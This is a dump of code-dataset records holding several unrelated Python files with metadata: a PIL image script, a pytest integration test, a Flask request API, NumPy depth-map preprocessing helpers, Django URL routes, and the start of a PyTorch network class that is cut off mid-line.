result.save('F:/picture/res1.jpg')\n\n\nif __name__ == '__main__':\n pinjie()", "sub_path": "slider/first1/图片.py", "file_name": "图片.py", "file_ext": "py", "file_size_in_byte": 829, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.BILINEAR", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 23, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "310344465", "text": "import pytest\n\nfrom threescale_api.resources import ApplicationPlan\n\n\n@pytest.fixture()\ndef pricing_rules(metric, application_plan: ApplicationPlan):\n params = dict(min=10, max=100, cost_per_unit=20)\n application_plan.pricing_rules(metric).create(params)\n return application_plan.pricing_rules(metric).list()\n\n\ndef test_create_pricing_rule(pricing_rules):\n assert pricing_rules is not None\n rule = pricing_rules[0]\n assert rule['max'] == 100\n assert rule['min'] == 10\n assert rule['cost_per_unit'] == '20.0'\n", "sub_path": "tests/integration/test_integration_pricing_rules.py", "file_name": "test_integration_pricing_rules.py", "file_ext": "py", "file_size_in_byte": 532, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threescale_api.resources.ApplicationPlan", "line_number": 7, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "70384006", "text": "from flask import Flask, request, jsonify\nfrom api.models import requests, Requests\nimport os\nimport sys\nimport json\nsys.path.append(os.getcwd())\n\napp = Flask(__name__)\n\n\n@app.route('/api/v1/users/requests', methods=['POST'])\ndef create_request():\n req = Requests()\n data = request.get_json()\n\n category = data[\"category\"]\n description = data[\"description\"]\n _id = len(requests)\n _id += 1\n\n if str(category) == \"\" or category is None:\n return jsonify({\n \"message\":\n \"Category missing, please fill in the category\"\n }), 204\n\n elif str(description) == \"\" or description is None:\n return jsonify({\n \"message\":\n \"Description missing. Please fill in the description\"\n }), 204\n\n else:\n\n req.add_request(_id, category, description)\n\n requests.append(req)\n return jsonify({\"message\": \"You successfully created a request\"}), 201\n\n\n@app.route('/api/v1/users/requests', methods=['GET'])\ndef get_all_requests():\n available_requests = len(requests)\n if available_requests > 0:\n print(available_requests)\n requests_list = []\n for i in requests:\n requests_list.append(i.get_all_data())\n return jsonify({\"requests\": requests_list})\n\n return jsonify({\"message\": \"There are no requests found\"}), 204\n\n\n@app.route('/api/v1/users/requests/<int:requestid>', methods=['GET'])\ndef get_single_request(requestid):\n if isinstance(requestid, int):\n return jsonify({\n \"message\": \"You successfully fetched one 
request\"\n }), 302\n else:\n return jsonify({\"message\": \"This request is not found\"}), 400\n\n\n@app.route('/api/v1/users/requests/<int:requestid>', methods=['PUT'])\ndef modify_request(requestid):\n available_requests = len(requests)\n\n if available_requests < 1:\n return jsonify({\n 'message': 'Request to be modified not found!',\n }), 400\n\n else:\n request_data = request.get_json()\n print(request_data)\n for a in requests:\n if a.requestid == requestid:\n a.category = request_data['category']\n a.description = request_data['description']\n return jsonify({\"request\": requests}), 200\n else:\n return jsonify({\n \"message\": \"Request to be modified not found\"\n }), 204\n", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2410, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "api.models.Requests", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "api.models.requests", "line_number": 18, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "api.models.requests.append", "line_number": 37, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 38, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 43, "usage_type": "argument"}, {"api_name": "api.models.requests", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 61, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 66, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "api.models.requests", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 80, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "56407544", "text": "import numpy as np\nimport h5py\nimport scipy\nimport math\nimport random\nimport skimage.color\nimport skimage.io\nimport skimage.transform\ndef add_boarders(image, labels, patch_size, masked_value):\n \"\"\"\n Adds a border to the image and the labels array according to the patch_size\n The border will be evenly split in all directions\n\n :param image: (w_image x h_image) np array, usually a depth_map\n :param labels: (w_image x h_image) np array, labels for each depth image pixel\n :param patch_size: 2d vector describing the patch size in [w_patch,h_patch]\n :param masked_value: All border 
pixel are set to this value\n\n :returns ( w_image + w_patch , h_image + h_patch ) np array\n \"\"\"\n result_shape = [image.shape[0] + patch_size[0], image.shape[1] + patch_size[1]]\n result = np.ones(result_shape) * masked_value\n labelsFinal = np.zeros(result_shape)\n xHalf = int(patch_size[0] / 2)\n yHalf = int(patch_size[1] / 2)\n result[xHalf:(result_shape[0] - xHalf -1), yHalf:(result_shape[1] - yHalf -1)] = image\n labelsFinal[xHalf:(result_shape[0] - xHalf - 1), yHalf:(result_shape[1] - yHalf - 1)] = labels\n return result, labelsFinal\n\n\ndef rescale_image_in_z(image, z_scaling_range, z_flip = False):\n # Rescale z\n z_min = np.min(np.min(image))\n z_max = np.max(np.max(image))\n input_z_scale = np.float32(z_max - z_min)\n output_z_range =np.float32(z_scaling_range[1] - z_scaling_range[0])\n #depthmap_centered = np.array(image)\n z_min_image = np.ones(image.shape)*z_min\n input_z_scale_image = np.ones(image.shape)*input_z_scale\n output_z_range_image = np.ones(image.shape) * output_z_range\n depthmap_centered = np.float32(image - z_min_image)\n if z_flip:\n image=input_z_scale_image-depthmap_centered\n\n result = np.float32(depthmap_centered * (output_z_range / input_z_scale) + z_scaling_range[0])\n\n print(\"rescaled image from ( \" + str(z_min) + \" - \" + str(z_max) +\n \" ) to ( \" + str( np.min(np.min(result))) + \" - \" + str( np.max(np.max(result))) + \" )\")\n return result.astype(np.float32)\n\ndef apply_filter(image, masked_value, kernel_size):\n\n image_size = image.shape\n result = np.array(image)\n kernelDelta = int(kernel_size/2)\n\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n\n if image[x][y] == masked_value:\n for i in range(-kernelDelta, kernelDelta+1):\n for j in range(-kernelDelta, kernelDelta + 1):\n result[x+i][y+j] = masked_value\n\n return result\n\ndef apply_contour_filter(image, masked_value =255, kernel_size = 3, simulataion_data = False):\n image_size = image.shape\n result = np.zeros(image_size)\n kernel = int(kernel_size/2)\n\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n\n curr_value = image[x][y]\n if curr_value == 0 or curr_value == 13:\n if simulataion_data:\n continue # for bin in simulation data\n count = 0\n for i in range(-kernel, kernel+1):\n for j in range(-kernel, kernel + 1):\n if image[x+i][y+j] !=curr_value:\n count+=1\n break\n if count!=0:\n result[x][y] = masked_value\n return result\n\ndef apply_label_filter(labels, kernel_size = 3):\n image_size = labels.shape\n result = labels\n kernel = int(kernel_size/2)\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n\n curr_value = labels[x,y]\n if curr_value == 0:\n continue\n count = 0\n labels_in_kernel = []\n for i in range(-kernel, kernel+1):\n for j in range(-kernel, kernel + 1):\n if [i,j] == [0,0]:\n continue\n labels_in_kernel.append(labels[x+i,y+j])\n if labels[x+i,y+j]==curr_value:\n count+=1\n if count<=2:\n counts = np.bincount(labels_in_kernel)\n result[x,y] = np.argmax(counts)\n return result\n\n\n\n\n\n\ndef apply_dilation_filter_on_labels(image, labels, masked_value =255, kernel_size = 3):\n image_size = image.shape\n result = labels\n kernel = int(kernel_size/2)\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n curr_value = labels[x,y]\n\n\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n 
curr_value = labels[x,y]\n count = 0\n if curr_value == masked_value:\n for i in range(-kernel, kernel+1):\n for j in range(-kernel, kernel + 1):\n if labels[x+i][y+j] !=masked_value:\n count+=1\n break\n if count>=2:\n result[x,y] = masked_value\n return result\n\n\n\n\n\n\n\n\ndef blur_depth_image(depth_image, kernel_size, masked_value):\n \"\"\"\n Blurs an image according to the following algorithm:\n - A pixel is only blurred if it's equal to the masked_value\n - Then the average of all neighbours unequal to masked_value is used for pixel\n - If there are no neighbours or the pixel is not equal to the masked_value, nothing is changed\n - Borders are not considered\n\n :param depth_image: (w_image x h_image) np array\n :param kernel_size: scalar, should be odd\n :param masked_value: the value which should be\n\n :returns ( w_image + w_patch , h_image + h_patch ) np array\n \"\"\"\n # Initialize image with masked value\n image_size = depth_image.shape\n result = np.ones(image_size) * masked_value\n kernelDelta = int(kernel_size/2)\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n\n if not depth_image[x, y] == masked_value:\n result[x, y] = depth_image[x, y]\n else:\n\n # For each pixel iterate over the kernel\n n_neighbours = 0\n sum_neighbours = 0\n\n for dx in range(kernel_size):\n for dy in range(kernel_size):\n value = depth_image[x - kernelDelta + dx, y - kernelDelta + dy]\n\n if not value == masked_value:\n n_neighbours += 1\n sum_neighbours += value\n\n if n_neighbours > 0:\n result[x, y] = sum_neighbours / n_neighbours\n # Other case not needed since image is initialized with masked_value\n\n return result\n\ndef blur_depth_image_with_labels(depth_image, labels, kernel_size, masked_value):\n \"\"\"\n Blurs an image according to the following algorithm:\n - A pixel is only blurred if it's equal to the masked_value\n - Then the average of all neighbours unequal to masked_value is used for pixel\n - If there are no neighbours or the pixel is not equal to the masked_value, nothing is changed\n - Lables of the hole pixel is changed based on the voting of the lables of the neighbours\n - Borders are not considered\n\n :param depth_image: (w_image x h_image) np array\n :param labels: (w_image x h_image) np array\n :param kernel_size: scalar, should be odd\n :param masked_value: the value which should be\n\n :returns ( w_image + w_patch , h_image + h_patch ) np array\n \"\"\"\n # Initialize image with masked value\n image_size = depth_image.shape\n labels_size = labels.shape\n result = np.ones(image_size) * masked_value\n kernelDelta = int(kernel_size/2)\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n\n if not depth_image[x, y] == masked_value:\n result[x, y] = depth_image[x, y]\n else:\n\n # For each pixel iterate over the kernel\n n_neighbours = 0\n sum_neighbours = 0\n labels_in_kernel = []\n label1 = 0 # Kiste\n label0 = 0\n\n for dx in range(kernel_size):\n for dy in range(kernel_size):\n value = depth_image[x - kernelDelta + dx, y - kernelDelta + dy]\n label_pixel = labels[x - kernelDelta + dx, y - kernelDelta + dy]\n\n\n if not value == masked_value:\n n_neighbours += 1\n sum_neighbours += value\n labels_in_kernel.append(label_pixel)\n # if label_pixel==1.0:\n # label1+=1\n # if label_pixel==0.0:\n # label0+=1\n\n if n_neighbours > 0:\n result[x, y] = sum_neighbours / n_neighbours\n labels[x, y] = 
np.argmax(np.bincount(labels_in_kernel))\n # if label0 >= label1:\n # labels[x,y]=0.0\n # else:\n # labels[x,y]=1.0\n # Other case not needed since image is initialized with masked_value\n\n return result, labels\n\ndef remove_stray_labels(depth_image, labels, kernel_size, masked_value):\n image_size = depth_image.shape\n labels_size = labels.shape\n result = labels\n kernelDelta = int(kernel_size / 2)\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n if not labels[x,y] == masked_value:\n continue\n else:\n n_neighbours = 0\n sum_neighbours = 0\n labels_neighbours = []\n distance_labels = []\n for dx in range(kernel_size):\n for dy in range(kernel_size):\n value = depth_image[x - kernelDelta + dx, y - kernelDelta + dy]\n label = labels[x - kernelDelta + dx, y - kernelDelta + dy]\n height_diff = abs(value-depth_image[x,y])\n if (dx,dy) != (1,1) :\n distance_labels.append(abs(value-depth_image[x,y]))\n labels_neighbours.append(label)\n\n if label == masked_value:\n sum_neighbours+=1\n if sum_neighbours >=5:\n continue\n else:\n index = np.argmin(distance_labels)\n result[x,y] = labels_neighbours[int(index)]\n return result\n\n\n\n\ndef normalizeDepthMap(depth_image, labels):\n\n depthMin = np.min(depth_image)\n depthMax = np.max(depth_image)\n depthSpan = depthMax -depthMin\n depthMean = np.mean(depth_image)\n #print(\"Depth Mean \", depthMean)\n depth_image_norm = np.zeros(depth_image.shape)\n\n for x in range(depth_image.shape[0]):\n for y in range(depth_image.shape[1]):\n #print(depth_image[x][y])\n depth_image[x][y] = 200 * (depth_image[x][y]-depthMin)/depthSpan\n\n #depth_image_norm[x][y] = (depth_image[x][y]-depthMean)/1\n\n #print(depth_image_norm[x][y], depth_image[x][y])\n print(\"depthMin = \", np.min(depth_image))\n print(\"depthMax = \", np.max(depth_image))\n # depthMean = np.mean(depth_image)\n # print(\"Depth Mean \", depthMean)\n # for x in range(depth_image.shape[0]):\n # for y in range(depth_image.shape[1]):\n # #print(depth_image[x][y])\n # depth_image_norm[x][y] = (depth_image[x][y] - depthMean) / 1\n\n #print(\"Depth Minimum\", depthMin)\n #print(\"Depth Maxmimum\", depthMax)\n\n return depth_image, labels\n\ndef postFilter(depth_image, labels):\n print(\"Shape \", depth_image.shape)\n depthMax = np.max(depth_image)\n for x in range(depth_image.shape[0]-1):\n for y in range(depth_image.shape[1]-1):\n if depth_image[x][y] == depthMax:\n labels[x][y] = 0\n\n return depth_image, labels\n\ndef adjustBorders(depth_image, labels, probability, patch_size):\n labelsFinal = np.zeros(depth_image.shape)\n probabilityFinal = np.zeros(depth_image.shape)\n xHalf = int(patch_size[0] / 2)\n yHalf = int(patch_size[1] / 2)\n labelsFinal[xHalf:(labelsFinal.shape[0] - xHalf ), yHalf:(labelsFinal.shape[1] - yHalf)] = labels\n probabilityFinal[xHalf:(labelsFinal.shape[0] - xHalf), yHalf:(labelsFinal.shape[1] - yHalf)] = probability\n\n return depth_image, labelsFinal, probabilityFinal\n\ndef resize_image(image, min_dim=None, max_dim=None, min_scale=None, mode=\"square\", array_type = 'labels'):\n \"\"\"Resizes an image keeping the aspect ratio unchanged.\n\n min_dim: if provided, resizes the image such that it's smaller\n dimension == min_dim\n max_dim: if provided, ensures that the image longest side doesn't\n exceed this value.\n min_scale: if provided, ensure that the image is scaled up by at least\n this percent even if min_dim doesn't require it.\n mode: Resizing mode.\n none: No resizing. 
Return the image unchanged.\n square: Resize and pad with zeros to get a square image\n of size [max_dim, max_dim].\n pad64: Pads width and height with zeros to make them multiples of 64.\n If min_dim or min_scale are provided, it scales the image up\n before padding. max_dim is ignored in this mode.\n The multiple of 64 is needed to ensure smooth scaling of feature\n maps up and down the 6 levels of the FPN pyramid (2**6=64).\n crop: Picks random crops from the image. First, scales the image based\n on min_dim and min_scale, then picks a random crop of\n size min_dim x min_dim. Can be used in training only.\n max_dim is not used in this mode.\n\n Returns:\n image: the resized image\n window: (y1, x1, y2, x2). If max_dim is provided, padding might\n be inserted in the returned image. If so, this window is the\n coordinates of the image part of the full image (excluding\n the padding). The x2, y2 pixels are not included.\n scale: The scale factor used to resize the image\n padding: Padding added to the image [(top, bottom), (left, right), (0, 0)]\n \"\"\"\n # Keep track of image dtype and return results in the same dtype\n image_dtype = image.dtype\n # Default window (y1, x1, y2, x2) and default scale == 1.\n h, w = image.shape[:2]\n window = (0, 0, h, w)\n scale = 1\n padding = [(0, 0), (0, 0)]\n cropping = [0,0]\n iScropping = False\n crop = None\n padding_constant = np.amax(image) if array_type == 'depth' else 0 # 0\n\n if mode == \"none\":\n return image, window, scale, padding, crop\n\n # Scale?\n if min_dim:\n # Scale up but not down\n scale = max(1, min_dim / min(h, w))\n if min_scale and scale < min_scale:\n scale = min_scale\n\n # Does it exceed max dim?\n if max_dim and mode == \"square\":\n image_max = max(h, w)\n if round(image_max * scale) > max_dim:\n print(\"Exceeds maximum dimension, needs cropping\")\n mode = \"crop_centre\"\n #scale = max_dim / image_max\n\n # Resize image using bilinear interpolation\n if scale != 1:\n image = skimage.transform.resize(\n image, (round(h * scale), round(w * scale)),\n order=1, mode=\"constant\", preserve_range=True)\n\n # Need padding or cropping?\n if mode == \"square\":\n # Get new height and width\n h, w = image.shape[:2]\n top_pad = (max_dim - h) // 2\n bottom_pad = max_dim - h - top_pad\n left_pad = (max_dim - w) // 2\n right_pad = max_dim - w - left_pad\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=padding_constant)\n window = (top_pad, left_pad, h + top_pad, w + left_pad)\n elif mode == \"pad64\":\n h, w = image.shape[:2]\n # Both sides must be divisible by 64\n assert min_dim % 64 == 0, \"Minimum dimension must be a multiple of 64\"\n # Height\n if h % 64 > 0:\n max_h = h - (h % 64) + 64\n top_pad = (max_h - h) // 2\n bottom_pad = max_h - h - top_pad\n else:\n top_pad = bottom_pad = 0\n # Width\n if w % 64 > 0:\n max_w = w - (w % 64) + 64\n left_pad = (max_w - w) // 2\n right_pad = max_w - w - left_pad\n else:\n left_pad = right_pad = 0\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=0)\n window = (top_pad, left_pad, h + top_pad, w + left_pad)\n elif mode == \"crop\":\n # Pick a random crop\n h, w = image.shape[:2]\n y = random.randint(0, (h - min_dim))\n x = random.randint(0, (w - min_dim))\n crop = (y, x, min_dim, min_dim)\n image = image[y:y + min_dim, x:x + min_dim]\n window = (0, 0, min_dim, min_dim)\n elif mode == \"crop_centre\":\n iScropping = True\n padding = [(0, 0), 
(0, 0)]\n h, w = image.shape[:2]\n y_start = (h//2)-(max_dim//2)\n x_start = (w//2)-(max_dim//2)\n if y_start >=0 and x_start>=0:\n image = image[y_start:max_dim+y_start, x_start:max_dim+x_start]\n elif y_start < 0:\n top_pad = (max_dim - h) // 2\n bottom_pad = max_dim - h - top_pad\n left_pad = 0\n right_pad = 0\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=padding_constant)\n image = image[:, x_start:max_dim + x_start]\n cropping = [y_start, x_start]\n elif x_start < 0:\n top_pad = 0\n bottom_pad = 0\n left_pad = (max_dim - w) // 2\n right_pad = max_dim - w - left_pad\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=padding_constant)\n image = image[y_start:max_dim + y_start, :]\n cropping = [y_start, x_start]\n else:\n raise Exception(\"Mode {} not supported\".format(mode))\n return image.astype(image_dtype), padding , cropping, iScropping\n\ndef flip_depthimage(depthmap):\n input_min = np.min(depthmap)\n input_max = np.max(depthmap)\n input_span = input_max - input_min\n\n depthmap = input_span - depthmap\n\n return depthmap\n\ndef remap_labels_to_org_image(depthmap_org, labels_resize, padding, cropping, iScropping, resize_size = 800):\n print(\"Original Depthmap shape : \", depthmap_org.shape)\n if iScropping == False:\n h, w = labels_resize.shape[:2]\n labels_org = labels_resize[padding[0][0]:h - padding[0][1], padding[1][0]:w - padding[1][1]]\n if labels_org.size == 0:\n labels_org = labels_resize[padding[0][0]:h - padding[0][1],\n padding[1][0]:w - padding[1][1]]\n print(\"Converted Labels Shape : \", labels_org.shape)\n\n else:\n if cropping[0] >= 0 and cropping[1] >= 0:\n h_org, w_org = depthmap_org.shape[:2]\n labels_org = np.zeros(depthmap_org.shape)\n labels_org[cropping[0]:cropping[0] + resize_size, cropping[1]:cropping[1] + resize_size] = labels_resize\n print(\"Converted Labels Shape : \", labels_org.shape)\n\n elif cropping[0] < 0: # h < w\n h_org, w_org = depthmap_org.shape[:2]\n labels_interm = labels_resize[padding[0][0]:resize_size - padding[0][1], :]\n labels_org = np.zeros(depthmap_org.shape)\n labels_org[:, cropping[1]:cropping[1] + resize_size] = labels_interm\n print(\"Converted Labels Shape : \", labels_org.shape)\n elif cropping[1] < 0: # h > w\n h_org, w_org = depthmap_org.shape[:2]\n labels_interm = labels_resize[:, padding[1][0]:resize_size - padding[1][1]]\n labels_org = np.zeros(depthmap_org.shape)\n labels_org[cropping[0]:cropping[0] + resize_size, :] = labels_interm\n print(\"Converted Labels Shape : \", labels_org.shape)\n\n return labels_org", "sub_path": "Code/V2/common/depthmap_helpers.py", "file_name": "depthmap_helpers.py", "file_ext": "py", "file_size_in_byte": 20766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 40, "usage_type": "call"}, 
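The "square" branch of resize_image above centres the content and pads out to (max_dim, max_dim) while recording the window of real pixels. A minimal self-contained sketch of just that bookkeeping (pad_to_square and its arguments are illustrative names, not part of the module):

import numpy as np

def pad_to_square(image, max_dim, pad_value=0):
    # Pad a 2-D array with a constant so it becomes (max_dim, max_dim),
    # keeping the original content centred.
    h, w = image.shape[:2]
    top = (max_dim - h) // 2
    bottom = max_dim - h - top
    left = (max_dim - w) // 2
    right = max_dim - w - left
    padded = np.pad(image, [(top, bottom), (left, right)], mode='constant', constant_values=pad_value)
    # window marks where the original pixels live inside the padded result
    window = (top, left, top + h, left + w)
    return padded, window

padded, window = pad_to_square(np.ones((3, 5)), 8)
assert padded.shape == (8, 8) and window == (2, 1, 5, 6)

The window tuple is what later lets remap_labels_to_org_image strip the padding back off.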
{"api_name": "numpy.float32", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 384, "usage_type": "call"}, {"api_name": "skimage.color.transform.resize", "line_number": 406, "usage_type": "call"}, {"api_name": "skimage.color.transform", "line_number": 406, "usage_type": "attribute"}, {"api_name": "skimage.color", "line_number": 406, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 440, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 445, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 473, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 515, "usage_type": "call"}]} +{"seq_id": "443027674", "text": "'''\r\nCreated on 2018. 9. 
16.\r\n\r\n@author: user\r\n'''\r\nfrom django.urls import path\r\nfrom .views import *\r\n#When creating a sub urls file, the app_name variable is required\r\n#app_name : the variable that groups these urls\r\napp_name = 'vote'\r\nurlpatterns = [\r\n    #http://127.0.0.1:8000/vote/\r\n    path('', index, name='index'),\r\n    #http://127.0.0.1:8000/vote/(number)/\r\n    path('<int:question_id>/', detail, name='detail'),\r\n    #http://127.0.0.1:8000/vote/vote\r\n    path('vote/', vote, name='vote'),\r\n    path('result/<int:question_id>/', result, name='result'),\r\n    path('qR/', questionRegister, name='questionRegister'),\r\n    path('qU/<int:question_id>/', questionUpdate, name='questionUpdate'),\r\n    path('qD/<int:question_id>/', questionDelete, name='questionDelete'),\r\n    path('cD/<int:choice_id>/', choiceDelete, name='choiceDelete'),\r\n    path('cR/', choiceRegister, name='choiceRegister'),\r\n    path('cU/', choiceUpdate, name='choiceUpdate'),\r\n    ]\r\n", "sub_path": "Django9/src/vote/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 974, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "635356774", "text": "from LoadTrainingData import loadTrainingData\nfrom load_data import loadData\nfrom neededRelations import neededRelations\nimport torch\nimport tqdm, random\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\n\n\nimport collections\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nclass Net(nn.Module):\n    def __init__(self, wordMap, relations, DIM=16, PENULT=45, lamb=.0002, learning_rate=.2):\n        super(Net, self).__init__()\n        self.DIM = DIM\n        self.PENULT = PENULT\n        self.vocab_size = len([key for key in wordMap])\n        dtype = torch.FloatTensor\n        self.Vocab = Variable(torch.rand(self.vocab_size, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.matrices = Variable(torch.rand(DIM, DIM, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.matrix = Variable(torch.rand(DIM*2, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.bias = Variable(torch.rand(1, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.classifierMatrices = Variable(torch.rand(DIM, DIM, PENULT).type(dtype)*.02-.01, requires_grad=True)\n        self.classifierMatrix = Variable(torch.rand(DIM*2, PENULT).type(dtype)*.02-.01, requires_grad=True)\n        self.classifierBias = Variable(torch.rand(1, PENULT).type(dtype)*.02-.01, requires_grad=True)\n        self.Dense = Variable(torch.rand(PENULT, len(relations)).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseBias = Variable(torch.rand(1, len(relations)).type(dtype)*.02-.01, requires_grad=True)\n        self.softmax = nn.Softmax(dim=1)\n        self.tanh = nn.Tanh()\n        self.leakyRelu = nn.LeakyReLU(.01)\n        self.learning_rate = learning_rate\n        self.trainable = [self.matrices, self.matrix, self.bias, self.classifierMatrices, self.classifierMatrix, 
